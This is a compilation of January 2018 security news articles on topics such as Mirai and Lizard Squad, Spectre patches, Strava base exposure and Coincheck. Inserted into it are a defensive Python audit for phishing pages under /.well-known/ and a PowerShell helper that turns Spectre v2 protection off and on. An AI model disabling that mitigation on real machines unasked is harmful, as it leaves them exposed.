English Articles -


Phishing Pages Hidden in "well-known" Directory
30.1.2018 securityweek 
Phishing
UK-based cybercrime disruption services provider Netcraft has spotted thousands of phishing pages placed by cybercriminals in special directories that are present on millions of websites.

In the past month, the company spotted more than 400 new phishing websites hosted in a folder named /.well-known/. This directory serves as a Uniform Resource Identifier (URI) path prefix that allows users and automated processes to obtain policy and other information about the host.

The /.well-known/ directory is commonly used to demonstrate ownership of a domain. The administrators of HTTPS-protected websites that use Automatic Certificate Management Environment (ACME) to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ folders to show the certificate issuer that they control the domain.

“Consequently, most of the phishing attacks that make use of the /.well-known/ directory have been deployed on sites that support HTTPS, using certificates issued by ACME-driven certificate authorities like Let's Encrypt and cPanel,” Netcraft’s Paul Mutton explained.

[Image: Alibaba phishing page hosted in /.well-known/ - credits: Netcraft]

The /.well-known/ location is a convenient place to hide a phishing page: the folder is present on millions of websites, mainly thanks to the success of ACME and Let’s Encrypt, yet many administrators are not aware that it exists.

Mutton noted that since the directory’s name begins with a dot, listing files with the ls command will not display it, because files and folders whose names start with “.” are hidden by default. To make their phishing pages even harder to find, cybercriminals have placed them in subdirectories of /acme-challenge/ and /pki-validation/.

“Shared hosting platforms are particularly vulnerable to misuse if the file system permissions on the /.well-known/ directories are overly permissive, allowing one website to place content on another customer's website,” Mutton warned. “Some of the individual servers involved in these attacks were hosting ‘well-known’ phishing sites for multiple hostnames, which lends weight to this hypothesis.”

The expert pointed out that while /acme-challenge/ and /pki-validation/ are not the only well-known URIs, these are the only ones that have been used to host phishing sites.

Netcraft said it was not clear how malicious actors had hijacked the websites found to be hosting these phishing pages.
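A defender-side check for the two conditions Netcraft describes (web content dropped under the validation folders, and overly permissive directory modes on shared hosts), written as an added example that is not part of the Netcraft write-up. The file-name patterns for legitimate ACME and pki-validation files are assumptions and should be adjusted for the CA in use.

```python
"""Audit a site's /.well-known/ tree for content that does not belong there.

Added example, not from the article: flags served web content and nested
directories under acme-challenge/ and pki-validation/, plus world-writable
directories of the kind that let one tenant write into another's site.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

VALIDATION_DIRS = {"acme-challenge", "pki-validation"}
# Assumed shape of legitimate validation files: a bare base64url token
# (ACME http-01) or a hex-named .txt file (pki-validation).
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]+(\.txt)?$")
# Extensions that indicate served web content rather than a validation token.
CONTENT_EXT = {".html", ".htm", ".php", ".phtml", ".js", ".asp", ".aspx"}


def audit_well_known(webroot):
    """Return a list of (finding, path-relative-to-webroot) tuples."""
    webroot = Path(webroot)
    wk = webroot / ".well-known"
    findings = []
    if not wk.is_dir():
        return findings
    for dirpath, _dirnames, filenames in os.walk(wk):
        d = Path(dirpath)
        rel_dir = d.relative_to(webroot).as_posix()
        # Shared-hosting risk from the article: a world-writable directory lets
        # another customer drop files into this site's /.well-known/.
        if d.stat().st_mode & stat.S_IWOTH:
            findings.append(("world-writable-dir", rel_dir))
        parts = d.relative_to(wk).parts
        in_validation = len(parts) > 0 and parts[0] in VALIDATION_DIRS
        # Validation folders are flat; nested directories are where the
        # phishing pages described above were hidden.
        if in_validation and len(parts) > 1:
            findings.append(("unexpected-subdir", rel_dir))
        for name in filenames:
            rel = (d / name).relative_to(webroot).as_posix()
            if Path(name).suffix.lower() in CONTENT_EXT:
                findings.append(("web-content", rel))
            elif in_validation and not TOKEN_RE.match(name):
                findings.append(("non-token-file", rel))
    return findings


def build_sample_webroot():
    """Build a throwaway web root mixing clean and abused layouts.

    Constructed sample data, not taken from any real site.
    """
    root = Path(tempfile.mkdtemp(prefix="wk-audit-"))
    wk = root / ".well-known"
    acme = wk / "acme-challenge"
    pki = wk / "pki-validation"
    hidden = acme / "secure-login"          # nested kit directory
    for p in (acme, pki, hidden):
        p.mkdir(parents=True)
    for p in (wk, acme, pki, hidden):
        os.chmod(p, 0o755)                  # normal, non-world-writable mode
    (acme / "dGhpc2lzYXRva2Vu_abc-123").write_text("token.keyauth")  # legitimate ACME token
    (pki / "A1B2C3D4E5F6.txt").write_text("dcv")                     # legitimate DCV file
    (wk / "security.txt").write_text("Contact: mailto:security@example.com")
    (hidden / "index.php").write_text("<?php /* stand-in for a phishing kit */ ?>")
    (acme / "verify.html").write_text("<html>fake bank login</html>")
    os.chmod(pki, 0o777)                    # the overly permissive mode the article warns about
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for kind, path in audit_well_known(sample):
        print(f"{kind:20} {path}")
```

Running it against a real web root means passing the document root path to audit_well_known; a legitimate security.txt produces no finding, while HTML or PHP under the validation folders does.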


Researchers Connect Lizard Squad to Mirai Botnet
30.1.2018 securityweek  BotNet
Lizard Squad and Mirai, which are responsible for a series of notorious distributed denial of service (DDoS) attacks, are connected to one another, a recent ZingBox report reveals.

Lizard Squad is a hacking group known for some of the most highly publicized DDoS attacks in history, including the disruption of Sony PlayStation and Xbox Live networks. Over the past several years, multiple individuals suspected to have used Lizard Squad’s LizardStresser DDoS service have been arrested.

While the hacking group has been operating for several years, Mirai has been around for only one year and a half, making headlines in late 2016 following massive DDoS attacks against Brian Krebs’ blog and Dyn’s DNS infrastructure. The malware’s source code was made public within weeks of these attacks and numerous variants have emerged since.

Now, ZingBox researchers claim to have discovered evidence that links the Lizard Squad hackers and Mirai, including the common use of the same Ukraine hosting provider Blazingfast.

The Mirai source code, the researchers point out, was released nine days after Lizard Squad founder Zachary Buchta was arrested. According to them, the DDoS attack on Brian Krebs’ blog in late 2016 appears the result of the journalist’s criticism against Lizard Squad, and there are also references to Mirai on a Lizard Squad website.

Analysis of a domain associated with a Mirai-based malware campaign in late 2017 led the researchers to bigbotPein, a group linked to Lizard Squad. The analyzed domain was registered by an individual associated with Lizard Squad, a ZingBox report (PDF) claims.

bigbotPein, a group that emerged in support of Buchta following his arrest, adopted Mirai as part of its Internet of Things arsenal and is currently targeting multiple architectures, including x86, x64, ARM, MIPS, SuperH, SPARC and ARC.

What’s more, the group has also added Ethereum and Monero miners to their malware portfolio, while also adopting increased sophistication, the security researchers say.

A Mirai-based campaign observed in October 2017 was pointing to the domain bigbotpein[.]com. The website’s Start of Authority (SOA) points to blazingfast[.]io, the Ukraine hosting provider that is also used by Mirai authors for the botnet control server, ZingBox says.

The security researchers claim they were also able to link the group to multiple Mirai variants out there, including Satori and Masuta. According to them, the Satori campaign was initially called Okiru and was using the control[.]almahosting[.]ru and network[.]bigbotpein[.]com domains.

Starting in mid-January 2018, all the domains related to Lizard Squad and bigbotPein switched to US-based ISPs (Rackspace and Search Guide), which suggests a clear connection between the two groups.

Two other Mirai variants observed last year include Masuta and Memes. The former, detailed only this month, targeted x86, ARM and MIPS architectures. The latter appears to be the work of the same author and might be an evolution of Masuta.

The malware code, ZingBox claims, includes a “structure previously identified in July 2017 related to Lizard Squad.” This code allows the malware to hide and decode second stage payload in memory. Both an Ethereum dropper variant linked to Lizard Squad and Masuta/Memes use this same code structure.

Other evidence linking Lizard Squad and Mirai includes the dropping of a file from the bigbotPein domain control[.]almahosting[.]ru as part of a Satori campaign in November 2017, leading to the Monero Stratum miner.

A Satori variant observed in early January 2018 employed an extra level of obfuscation, along with the s[.]sunnyjuly[.]gq domain, and pointed to the use of an Ethereum miner for Windows, although the initial attack vector targeted the MIPS architecture.

“During this research, we witnessed firsthand the evolving complexity of the different variants of Lizard Squad and bigbotPein group’s malware within a span of one year […]. The Lizard Squad and bigbotPein groups used to be very active creating most of the well-known variants of Mirai,” ZingBox’ report reads.

“Despite the courageous efforts of our law enforcement agencies to identify and tear down various hacking groups, the collaboration between groups makes it extremely difficult to completely shut down their efforts for good. Arrests of high-profile members and founders of such groups certainly slows down their momentum, but organizations can’t take their foot off the gas when it comes to being vigilant about the security of their network,” Xu Zou, CEO and co-founder, ZingBox, said.


Lenovo Addresses Hardcoded Password in Fingerprint Manager
30.1.2018 securityweek 
Vulnerability
Computer maker Lenovo has updated Fingerprint Manager Pro for Windows 7, 8, and 8.1 to address several insecure credential storage issues in the software, including the presence of a hardcoded password.

Rated High severity and tracked as CVE-2017-3762, the vulnerability was discovered by Jackson Thuraisamy from Security Compass. An attacker attempting to exploit the issue could escalate their privileges on the local system.

The flaw only impacts Lenovo Fingerprint Manager Pro, a utility for Windows 7, 8, and 8.1 that has been designed to help users log into their PCs or authenticate to configured websites by means of fingerprint recognition.

The bug resides in the use of a weak algorithm when encrypting sensitive data stored by Fingerprint Manager Pro, such as users’ Windows logon credentials and fingerprint data, the company said in an advisory.

What’s more, the application was found to contain a hardcoded password and to be accessible to all users with local non-administrative access to the computer it is installed on.

According to Lenovo, the application may be installed on a large number of device models, including ThinkPad L560, P40 Yoga, P50s, T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560, W540, W541, W550s, X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT), X240, X240s, X250, X260, Yoga 14 (20FY), and Yoga 460; ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, and M93z; and ThinkStation E32, P300, P500, P700, P900.

The vulnerability has been addressed in Lenovo Fingerprint Manager Pro version 8.01.87. Owners of the aforementioned models should update to the new software release.


U.S. Floats Idea Nationalizing High-Speed Networks, Drawing Rebukes
30.1.2018 securityweek  BigBrothers
US officials have launched a debate on a proposal to nationalize the newest generation of high-speed wireless internet networks in the name of national security, provoking sharp criticism from across the political spectrum.

One official familiar with the proposal but not authorized to speak publicly told AFP the idea "has been discussed over the past couple of weeks" at the request of US national security officials.

The proposal was first reported by the news website Axios, citing a memo proposing government control of the newest and fastest part of the nation's mobile network -- the fifth generation, or 5G -- to guard against China's growing online capabilities.

Axios cited a memo by a senior official as contending that the US needs to quickly deploy 5G because China is in a top position with the technology and "is the dominant malicious actor" online.

But the proposal -- which would run counter to the longstanding US policy of relying on private telecom networks -- drew immediate rebukes from the industry and even from US regulatory officials.

The official familiar with the proposal noted that "it's not hard to find people who think it's a dumb idea."

Industry leaders pointed out that the private sector is already in the process of building and deploying 5G systems, which will be important for a range of connected devices from appliances to self-driving cars.

The federal government stepping in would "slam the brakes" on momentum to deploy 5G, argued Jonathan Spalter, chief of USTelecom trade association.

"The best way to future-proof the nation's communications networks is to continue to encourage and incentivize America's broadband companies... in partnership with government, to continue to do what we do best: invest, innovate, and lead," Spalter said in a statement.

Meredith Attwell Baker, president of the wireless industry group CTIA, added that while 5G is important, "the government should pursue the free market policies that enabled the US wireless industry to win the race to 4G."

Federal Communications Commission chairman Ajit Pai, whose agency regulates the telecom sector, also voiced strong opposition.

"Any federal effort to construct a nationalized 5G network would be a costly and counterproductive distraction from the policies we need to help the United States win the 5G future," Pai, a Republican, said.

Pai's Democratic colleague on the FCC, Mignon Clyburn, agreed, saying a network built by the federal government "does not leverage the best approach needed for our nation to win the 5G race."

Conservative advocacy group FreedomWorks also came out against the idea, arguing that the move would put the US on the same level as China in controlling online access.

FreedomWorks president Adam Brandon said, "We're not beating the Chinese if we sacrifice what makes our government so different from theirs."


Military personnel improperly used Fitness Strava Tracker exposed their bases
30.1.2018 securityaffairs BigBrothers

Military personnel worldwide have publicly shared online their exercise routes recorded with the Strava fitness tracker, revealing fitness sessions conducted inside or near military bases.
We have discussed the privacy risks related to IoT devices many times; here we discuss an alarming case in which the Strava fitness tracker revealed details of military bases.

American and allied military worldwide have publicly shared their exercise routes online revealing the fitness sessions conducted inside or near military bases, including Afghanistan, Iraq, and Syria.

This leak of information happened because military personnel left their Strava fitness tracker switched on while exercising at the bases.

A map showing exercise routes recorded by users of a tracking app reveals sensitive information about military personnel in locations around the world, including Afghanistan, Iraq, and Syria.

Such kind of information could be used by enemies and terrorists to plan an attack.

Obviously, while in some regions of the globe it is impossible to distinguish the activity of military personnel from that of other users, in other locations the routes immediately stand out.

For example, examining the map of Iraq you can notice that the entire region is dark, except for a series of well-known military bases used by the American military and its allies.

The list of bases that are easy to locate thanks to the map associated with the Strava fitness tracker includes Taji north of Baghdad, Qayyarah south of Mosul, Speicher near Tikrit and Al-Asad in Anbar Province, along with a number of minor sites highlighted in northern and western Iraq.

Searching for bases in Afghanistan, it is easy to locate the Bagram Air Field north of Kabul along with other smaller sites in the south of the country.

[Image: Strava tracking app heatmap showing the movements of soldiers within Bagram air base – the largest US military facility in Afghanistan – Source BBC]

Similarly, in Syria, Qamishli in the northeast, a stronghold of US-allied Kurdish forces, is clearly visible.

Tobias Schneider, one of the security experts that discovered the map, shared details about the bases on Twitter, including the French Madama base in Niger.

Tobias Schneider (@tobiaschneider), 27 Jan 2018, replying to @tobiaschneider:
Worth browsing a bit. Three positions around the US outpost at Tanf: pic.twitter.com/jS7S4LR2QS

Tobias Schneider (@tobiaschneider), 7:57 PM - Jan 27, 2018:
My focus is on Syria, but obviously works all over. French military base Madama in Niger: pic.twitter.com/1e9SRR73xS

Tobias Schneider (@tobiaschneider), 27 Jan 2018, replying to @tobiaschneider:
A lot of people are going to have to sit thru lectures come Monday morning.

Tobias Schneider (@tobiaschneider), 8:37 PM - Jan 27, 2018:
So much cool stuff to be done. Outposts around Mosul (or locals who enjoy running in close circles around their houses): pic.twitter.com/wHItJwYUUI

The researcher Nathan Ruser also spotted the activities of Russian forces in Khmeimim.

Nathan Ruser (@Nrg8000), 27 Jan 2018, replying to @Nrg8000:
Not just US bases. Here is a Turkish patrol N of Manbij pic.twitter.com/1aiJVHSMZp

Nathan Ruser (@Nrg8000), 7:28 PM - Jan 27, 2018:
You can see the Russian operating area in Khmeimim, but also the guard patrol to the NE. pic.twitter.com/iWiX5Kozc1

The good news is this issue could be easily fixed, Strava confirmed that “athletes with the Metro/heatmap opt-out privacy setting have all data excluded.”

The app allows users to set up “privacy zones,” areas in which the Strava tracker does not record GPS data. These zones can be defined around the user’s home or workplace, but evidently the military personnel involved had not used them.


A new report from MALWAREBYTES reveals a rise of 90% on ransomware detection in business
30.1.2018 securityaffairs
Vulnerability

A new report from Malwarebytes titled “Malwarebytes Annual State of Malware Report” reveals a 90% rise in ransomware detections in business.
The report brings to light new trends in hacker activity and threats, especially the rise of ransomware as a tool of choice.

Researchers from Malwarebytes gathered an enormous amount of data from the telemetry of their products, their intel teams, and their data science team, covering January to November 2016 and January to November 2017, to trace the evolution of the malware threat landscape.

The report takes into account the infection tactics, attack methods, and development and distribution techniques used by hackers to target and compromise businesses and consumers alike. Ransomware detections for business customers surged by 90%, making ransomware the fifth most detected threat. Regarding modus operandi, the researchers found a change in the distribution of malicious payloads, which now include banking Trojans and cryptocurrency miners.

Ransomware was on the rise, but it was not the only method employed by hackers. The report reveals that hackers used banking trojans, spyware and hijackers to steal data, login credentials, contact lists and credit card data, and to spy on the user, as alternative ways of compromising system security. Hijacker detections grew 40% and spyware detections grew 30%. The report lists the top 10 business threat detections, the five most significant being Hijacker, Adware, Riskware Tool, Backdoor, and Ransomware, in that order.

While the report covers a variety of threats, it emphasizes how malware outbreaks have evolved. A game changer for ransomware outbreaks like WannaCry was the leaked government exploit tool EternalBlue, which has since been employed to compromise update processes, alongside an increase in geo-targeted attacks. According to the report, these tactics have been adopted to bypass traditional detection methods.

The report highlights the delivery techniques that ransomware gained from the EternalBlue exploit tool leaked from the NSA. This exploit was a landmark in the development of the WannaCry and NotPetya ransomware. EternalBlue (CVE-2017-0144) exploits a vulnerability in Server Message Block (SMB) handling present in many Windows operating systems. WannaCry was able to spread globally because of operating systems that had not been properly updated.

The report pays special attention to NotPetya, as it was influenced by the Petya and WannaCry ransomware. NotPetya used two Server Message Block (SMB) vulnerabilities, EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0145), and was also able to encrypt the MFT (Master File Table) and the MBR (Master Boot Record) on affected systems. Other malware analyzed in the report that used the exploit tools leaked from the NSA includes Adylkuzz, CoinMiner, and Retefe.

The researchers also describe a new attack vector employed by hackers: geo-targeted attacks. In this type of attack, hacker groups or rogue nations employ a variety of techniques to disrupt, destabilize, or compromise data in specific countries. The Magniber malicious code targeted South Korea specifically and BadRabbit targeted Ukraine. Although NotPetya emerged in Ukraine, its effects were not limited to that country’s borders.

Finally, the report presents trends based on the data collected. Cryptocurrency miners have already become a new threat, underlined by the recent news of a theft of bitcoins from Japan. Other trends to watch this year, according to the report, are attacks on the supply chain, the increase of malware on Mac systems, and leaks from governments and companies that will lead to new zero-day vulnerabilities.


On Saturday Malwarebytes delivered a buggy update that caused excessive memory usage and crashes.
30.1.2018 securityaffairs
Vulnerability

On Saturday Malwarebytes issued a buggy update to its home and enterprise products that caused serious problems for the users, including excessive memory usage, connectivity issues, and in some cases system crashes.

Malwarebytes issued the buggy update on Saturday morning (PST) and, according to the security firm, the software was available for only 16 minutes before it was removed.

“On the morning of Saturday, January 27th, 2018 protection update v1.0.3798 was released for all versions of Malwarebytes for Windows. As endpoints updated to this release, customers noticed their machines were reporting many Internet block notifications, and a sudden large increase in RAM usage” reads the Root Cause Analysis published by Malwarebytes.

“There are detection syntax controls in place to prevent such events as the one experienced in this incident. Recently we have been improving our products so that we can show the reason for a block, i.e. the detection “category” for the web protection blocks. In order to support this new feature, we added enhanced detection syntaxes to include the block category in the definitions. The unfortunate oversight was that one of the syntax controls was not implemented in the new detection syntax, which cause the malformed detection to be pushed into production.”

[Image: Malwarebytes buggy update]

Some users reported that their connections were blocked by the security software after the installation of the buggy update. Another problem reported by users was abnormal memory usage: the process associated with the application used up more than 10 GB of RAM, and in some cases system crashes were also observed.


Malwarebytes confirmed that the broken detection was present in update versions v1.0.3798 through v1.0.3802 (v2018.01.27.03 – v2018.01.27.11 for MBES customers).

The buggy update was issued to all software versions for Windows; the affected versions are listed below:

Malwarebytes for Windows Premium
Malwarebytes for Windows Premium Trial
Malwarebytes Endpoint Security (MBES)
Malwarebytes Endpoint Protection (Cloud Console)
The problem was addressed with the v1.0.3803 (v2018.01.27.12 for MBES customers).

Affected users can follow the recovery solutions published by the company to remove the buggy update and install the correct one.

The company remarked that it has routinely pushed tens of thousands of updates, testing each one before it is distributed.

“We have pushed upwards of 20,000 of these protection updates routinely. We test every single one before it goes out. We pride ourselves on the safety and accuracy of our detection engines and will work to ensure that this does not happen again,” Malwarebytes stated following the incident.


Over the weekend Microsoft rolled out out-of-band updates to disable mitigations for Spectre v2 attacks
30.1.2018 securityaffairs
Vulnerability

Over the weekend, Microsoft rolled out out-of-band updates to disable mitigations for one of the Spectre attack variants because they can cause systems to become unstable.
The situation is becoming embarrassing. Just after the release of the Meltdown and Spectre security updates, Intel ruled out any problems with their deployment, citing testing conducted by other tech giants.

At the same time, some companies were reporting severe issues, including performance degradation and in some cases crashes.

Last week, Intel changed its position on the security patches: it first published the results of its tests of the Meltdown and Spectre patches and confirmed that the impact on performance could be serious, then it recommended that customers stop deploying the current versions of the Spectre/Meltdown patches.

Now Microsoft has followed, rolling out over the weekend out-of-band updates that disable the mitigation for one of the Spectre attack variants because it can cause systems to become unstable.

“Our own experience is that system instability can in some circumstances cause data loss or corruption.” states the security advisory published by Microsoft.

“While Intel tests, updates and deploys new microcode, we are making available an out of band update today, KB4078130, that specifically disables only the mitigation against CVE-2017-5715 – “Branch target injection vulnerability.” In our testing this update has been found to prevent the behavior described.”

Microsoft was among the first companies to provide security updates for the Meltdown and Spectre vulnerabilities, but its patches caused severe issues on AMD systems.

The decision follows similar actions by other tech giants, including Red Hat, HP, Dell, Lenovo and VMware.

Microsoft and the companies above observed problems after installing the patches for Spectre Variant 2 (CVE-2017-5715, the branch target injection vulnerability) and for this reason opted to revert them.

While the Meltdown and Variant 1 of the Spectre attacks can be mitigated efficiently with software updates, the Spectre Variant 2 requires microcode updates to be fully addressed.

Intel published a technical note about the mitigation of the Spectre flaw; it addresses the issue with an opt-in flag, the IBRS_ALL bit (IBRS stands for Indirect Branch Restricted Speculation).

Linus Torvalds expressed his disappointment in an email to the Linux kernel mailing list, calling the Linux Spectre patches “UTTER GARBAGE”.

Microsoft confirmed that the patches issued by Intel cause system instability and can in some cases lead to data loss or corruption, for this reason, the company distributed over the weekend the Update KB4078130 for Windows 7, Windows 8.1 and Windows 10 that disables the mitigation for CVE-2017-5715.

The company has also provided detailed instructions for manually enabling and disabling the Spectre Variant 2 mitigations through registry settings.

Microsoft said it is not aware of any attack in the wild that exploited Spectre Variant 2 (CVE-2017-5715).

“As of January 25, there are no known reports to indicate that this Spectre variant 2 (CVE 2017-5715 ) has been used to attack customers. We recommend Windows customers, when appropriate, reenable the mitigation against CVE-2017-5715 when Intel reports that this unpredictable system behavior has been resolved for your device,” continues the advisory.


Malwarebytes Delivers Buggy Update to Home, Enterprise Users
29.1.2018 securityweek
Vulnerability
A protection update pushed out over the weekend by Malwarebytes to its home and enterprise users caused serious problems, including Web connection issues, excessive memory usage, and even system crashes.

The problematic update was released on Saturday morning, Pacific Standard Time (PST), and it was only available for 16 minutes before Malwarebytes took action to stop it from being distributed. However, it was enough for the update to reach a significant number of devices protected by the security firm’s products.

“There are detection syntax controls in place to prevent such events as the one experienced in this incident. Recently we have been improving our products so that we can show the reason for a block, i.e. the detection ‘category’ for the web protection blocks,” Malwarebytes explained. “In order to support this new feature, we added enhanced detection syntaxes to include the block category in the definitions. The unfortunate oversight was that one of the syntax controls was not implemented in the new detection syntax, which caused the malformed detection to be pushed into production.”

Some users reported that their Web connections had been blocked and the process associated with the Malwarebytes application had used up more than 10 Gb of their random access memory (RAM), causing their systems to become very slow and even crash.

The buggy protection update, namely v1.0.3798, was sent out to all versions of Malwarebytes for Windows. The affected applications include Malwarebytes for Windows Premium, including the trial version, Malwarebytes Endpoint Security (MBES), and Malwarebytes Endpoint Protection (Cloud Console). The Mac, Android, and other apps were not impacted.

Malwarebytes has provided detailed instructions for both home and enterprise users on how to recover from this incident and install the correct update on their systems. Users who had their devices turned off when the buggy update was delivered should not be affected.

“We have pushed upwards of 20,000 of these protection updates routinely. We test every single one before it goes out. We pride ourselves on the safety and accuracy of our detection engines and will work to ensure that this does not happen again,” Malwarebytes stated following the incident.

This was not the first time a security solutions provider released an update that caused headaches for home users and system administrators. Other companies involved in similar incidents in recent years include Panda Security, ESET, and Webroot.


Microsoft Disables Spectre Mitigations Due to Instability
29.1.2018 securityweek
Vulnerability

Out-of-band Windows updates released by Microsoft over the weekend disable mitigations for one of the Spectre attack variants as they can cause systems to become unstable.

Both microcode and software updates designed to address the Spectre and Meltdown vulnerabilities have turned out to be buggy, often making systems unbootable or causing them to reboot more frequently. Intel has temporarily suspended its patches until the issue is resolved and advised customers to stop deploying the updates.

HP, Dell, Lenovo, VMware, Red Hat and others had paused the patches and now Microsoft has done the same.

The problem appears to be related to CVE-2017-5715, which has been described as a “branch target injection vulnerability.” This is one of the flaws that allows Spectre attacks, specifically Spectre Variant 2 attacks.

Microsoft has confirmed that Intel’s patches cause system instability and can in some cases lead to data loss or corruption. Update KB4078130 released by the company over the weekend for Windows 7, Windows 8.1 and Windows 10 – for both clients and servers – disables the mitigation for CVE-2017-5715.

The company has also provided instructions for advanced users on how to manually enable and disable Spectre Variant 2 mitigations through registry settings.
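The registry-based toggle referred to here (and in the securityaffairs article above on the same KB4078130 update), written up as an added PowerShell helper that is not from the article or from Microsoft. It assumes the FeatureSettingsOverride and FeatureSettingsOverrideMask values under the Memory Management key, with bit 0 covering the branch target injection mitigation, as in Microsoft’s Windows client guidance at the time; check the current KB before relying on the bit layout.

```powershell
# Added example, not from the article or Microsoft: read and toggle the
# Spectre Variant 2 (CVE-2017-5715) mitigation override. Run elevated; a
# reboot is required before a change takes effect.
$MemMgmt = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management'

function Get-SpectreV2OverrideState {
    # Returns the raw override values and whether they switch Variant 2 off.
    $props    = Get-ItemProperty -Path $MemMgmt -ErrorAction SilentlyContinue
    $override = $props.FeatureSettingsOverride
    $mask     = $props.FeatureSettingsOverrideMask
    if ($null -eq $override -or $null -eq $mask) {
        return [pscustomobject]@{
            Override = $null; Mask = $null
            Variant2Disabled = $false; MeltdownDisabled = $false
            Note = 'no override present; OS default (mitigation on if patched)'
        }
    }
    # An override bit only counts when the same bit is set in the mask.
    $effective = $override -band $mask
    [pscustomobject]@{
        Override         = $override
        Mask             = $mask
        Variant2Disabled = [bool]($effective -band 1)   # bit 0: branch target injection mitigation off
        MeltdownDisabled = [bool]($effective -band 2)   # bit 1: kernel VA shadowing off (assumed layout)
        Note             = 'assumed bit layout from Microsoft client guidance'
    }
}

function Set-SpectreV2Mitigation {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)]
        [ValidateSet('Enable', 'Disable')]
        [string]$State
    )
    # Disable: set bit 0 and mask it in, leaving the Meltdown mitigation untouched.
    # Enable:  clear the override and mask in both bits (the documented "enable" pair).
    if ($State -eq 'Disable') { $override = 1; $mask = 1 } else { $override = 0; $mask = 3 }
    if ($PSCmdlet.ShouldProcess($MemMgmt, "Set FeatureSettingsOverride=$override, FeatureSettingsOverrideMask=$mask")) {
        New-ItemProperty -Path $MemMgmt -Name FeatureSettingsOverride     -PropertyType DWord -Value $override -Force | Out-Null
        New-ItemProperty -Path $MemMgmt -Name FeatureSettingsOverrideMask -PropertyType DWord -Value $mask     -Force | Out-Null
        Write-Host "Spectre Variant 2 mitigation set to '$State'. Reboot for the change to take effect."
    }
}

# Usage (elevated):
#   Get-SpectreV2OverrideState
#   Set-SpectreV2Mitigation -State Disable -WhatIf    # preview only
#   Set-SpectreV2Mitigation -State Enable             # re-enable once firmware is fixed
# Microsoft's SpeculationControl module (Install-Module SpeculationControl;
# Get-SpeculationControlSettings) reports whether the hardware/firmware support
# for the mitigation is actually present on the machine.
```

Re-enabling via Set-SpectreV2Mitigation -State Enable is the step Microsoft's advisory asks for once Intel confirms the microcode no longer causes the instability.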

“As of January 25, there are no known reports to indicate that this Spectre variant 2 (CVE 2017-5715 ) has been used to attack customers. We recommend Windows customers, when appropriate, reenable the mitigation against CVE-2017-5715 when Intel reports that this unpredictable system behavior has been resolved for your device,” Microsoft said in its advisory.

Microsoft quickly released mitigations for Meltdown and Spectre after the attack methods were disclosed, but the company’s own updates were also buggy. Shortly after it had started rolling them out, Microsoft was forced to suspend patches for devices with AMD processors due to instability issues.

The Spectre and Meltdown vulnerabilities allow malicious applications to bypass memory isolation mechanisms and access sensitive data. The Meltdown attack relies on one vulnerability, tracked as CVE-2017-5754, but there are two main variants of the Spectre attack, including CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2).

Meltdown and Variant 1 of Spectre can be patched efficiently with software updates, but Spectre Variant 2 requires microcode updates for a complete fix.

Intel, AMD and Apple face class action lawsuits over the Spectre and Meltdown vulnerabilities. However, Intel does not appear too concerned that the incident will affect its bottom line – the company expects 2018 to be a record year in terms of revenue.


Japan-based digital exchange Coincheck to refund customers after cyberheist
29.1.2018 securityaffairs Incident

Coincheck announced it will refund about $400 million to 260,000 customers after the hack, using its own funds.
On Friday, news of the hack of the Japan-based digital exchange Coincheck caused a drop in the value of the major cryptocurrencies; the incident had a significant impact on NEM, whose value dropped more than 16 percent in 24 hours.

The company suspended deposits and withdrawals for all virtual currencies except Bitcoin and announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole NEM worth half a billion US dollars; NEM is the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount of money that is greater than the value of bitcoins which disappeared from MtGox in 2014.

Coincheck was founded in 2012 and is one of the most important cryptocurrency exchanges in Asia.

The company announced it will refund about $400 million to customers after the hack.

Coincheck will use its own funds to reimburse about 46.3 billion yen to its 260,000 customers who were impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected.”

Experts believe that the Financial Services Agency will take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin, and nearly one-third of global Bitcoin transactions in December were denominated in yen. Cryptocurrencies, and Bitcoin in particular, are very popular in Japan; in April, Bitcoin was proclaimed legal tender by the local authorities.

According to Japanese bitcoin monitoring site Jpbitcoin.com, yen-denominated bitcoin trades reached a record 4.51 million bitcoins in November, nearly half of the 9.29 million bitcoins traded on the world’s major exchanges.

Japanese media criticized the company, blaming its management for underestimating the importance of protecting its investors; they said Coincheck “expanded business by putting safety second”.

Politicians and experts who participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, and governments are expected to adopt further measures to prevent abuse and illegal uses of cryptocurrencies.


Russia Infrastructure Spying Could Cause 'Total Chaos': UK Defence Minister
28.1.2018 securityweek BigBrothers

Britain's Defence Secretary Gavin Williamson has accused Russia of spying on its critical infrastructure as part of possible plans to create "total chaos" in the country that could "cause thousands and thousands of deaths".

In unusually alarmist words from a senior minister, Williamson told the Daily Telegraph that, in its research on UK power supply connections with Europe, Moscow appeared intent on sowing "panic" and hurting Britain.

"What they are looking at doing is they are going to be thinking 'how can we just cause so much pain to Britain?'" he said in comments published Thursday night.

"Damage its economy, rip its infrastructure apart, actually cause thousands and thousands and thousands of deaths, but actually have an element of creating total chaos within the country."

Williamson, who only became defence chief in November after predecessor Michael Fallon resigned over allegations of misconduct, gave the interview at the outset of a new five-month defence review.

He is reportedly pressuring finance minister Philip Hammond to allocate more money to defence and scrap further cuts to Britain's strained armed forces.

In the interview the minister said Russia acts in a way "that any other nation would see as completely unacceptable".


"Why would they keep photographing and looking at power stations, why are they looking at the interconnectors that bring so much electricity and so much energy into our country," he questioned in the paper.

"They are looking at these things because they are saying these are the ways that we can hurt Britain."

Earlier this week Fallon joined calls from the head of the army for more British military spending, amid warnings the country may struggle to match Russian battlefield capabilities.

Meanwhile the head of the National Cyber Security Centre said the country will likely face a major cyber-attack within two years.

